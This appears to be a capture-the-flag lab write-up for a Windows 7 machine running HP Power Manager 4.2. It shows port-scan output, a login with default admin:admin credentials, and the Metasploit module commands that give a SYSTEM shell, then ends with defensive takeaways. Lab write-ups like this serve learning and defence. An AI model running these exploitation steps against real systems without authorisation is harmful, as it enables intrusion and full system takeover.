Box: Windows 7 · Difficulty: Easy · Theme: Default credentials + a buffer overflow in legacy software
Kevin is a classic “old software will hurt you” box. The entire chain hinges on one outdated service — HP Power Manager v4.2 (Build 7) — sitting on port 80 behind default credentials. Once I confirmed the version, a known buffer overflow handed me a SYSTEM shell directly. There’s no privilege-escalation stage here: the exploit lands as SYSTEM on its own.
Recon
I kicked things off with a full rustscan piped into nmap for service and OS detection:
┌──(kali@kali)-[~/Desktop/Offsec]
└─$ rustscan -a 192.168.181.45 -- -A
Open 192.168.181.45:80
Open 192.168.181.45:135
Open 192.168.181.45:139
Open 192.168.181.45:445
Open 192.168.181.45:3389
Open 192.168.181.45:3573
Open 192.168.181.45:49152
Open 192.168.181.45:49153
Open 192.168.181.45:49154
Open 192.168.181.45:49155
Open 192.168.181.45:49158
Open 192.168.181.45:49159
Trimming the nmap output down to what mattered:
PORT STATE SERVICE VERSION
80/tcp open http GoAhead WebServer
| http-title: HP Power Manager
|_Requested resource was http://192.168.181.45/index.asp
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: KEVIN
| NetBIOS_Computer_Name: KEVIN
| Product_Version: 6.1.7600
3573/tcp open tag-ups-1?
49152-49159/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb-os-discovery:
| OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1)
| Computer name: kevin
|_ Workgroup: WORKGROUP
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
The ones that mattered:
- 80/tcp — GoAhead WebServer serving an HP Power Manager login page (the interesting one)
- 135 / 139 / 445 — MSRPC / NetBIOS / SMB (Windows 7 Ultimate N 7600, WORKGROUP)
- 3389/tcp — RDP (hostname: KEVIN,
Product_Version: 6.1.7600= Windows 7) - 3573/tcp plus a cluster of high ephemeral RPC ports
SMB allowed a blank session and had signing disabled, but nothing useful shook loose there. The real lead was that HP Power Manager app on port 80 — software old enough to be a red flag by itself.
Enumeration — Web (Port 80)
Browsing to http://192.168.181.45/ dropped me on the HP Power Manager login. Before reaching for anything fancy, I tried the oldest trick in the book — default credentials:
admin : admin
… and I was straight in. Digging through the application logs then revealed the exact build:
HP Power Manager version 4.2 (Build 7)
That version string is the whole ballgame. A quick searchsploit / Exploit-DB lookup for HP Power Manager 4.2 surfaces a stack buffer overflow with a ready-made Metasploit module.
Exploitation
I dropped into Metasploit to pull up the HP Power Manager buffer-overflow module:
msf6 > use exploit/windows/http/hp_power_manager_filename
msf6 exploit(windows/http/hp_power_manager_filename) > set RHOSTS 192.168.181.45
msf6 exploit(windows/http/hp_power_manager_filename) > set LHOST tun0
msf6 exploit(windows/http/hp_power_manager_filename) > run
The overflow triggers remote code execution against the vulnerable service — and because that service runs with high privileges, the session comes back as NT AUTHORITY\SYSTEM with no escalation needed.
(The lab also ships a Python PoC for the same overflow if you’d rather land it without Metasploit — same vulnerability, manual delivery.)
Proof
With a SYSTEM shell, grabbing the flag was trivial:
┌──(kali@kali)-[~/Desktop/Offsec/Kevin]
└─$ cat proof.txt
437b333343d4297041b7a13ae71a2c3f
Takeaways
- Default credentials are still everywhere.
admin:adminshouldn’t unlock anything — but on legacy appliances it constantly does. - Version disclosure = game over. The app volunteered its exact build in the logs, which was all I needed to find a matching public exploit.
- Legacy software carries legacy vulns. HP Power Manager 4.2’s overflow is a well-known, long-patched issue; running unsupported software leaves SYSTEM-level RCE one module away.
- Defensive fix: rotate default creds, keep management software patched and supported, and never expose admin web panels to untrusted networks.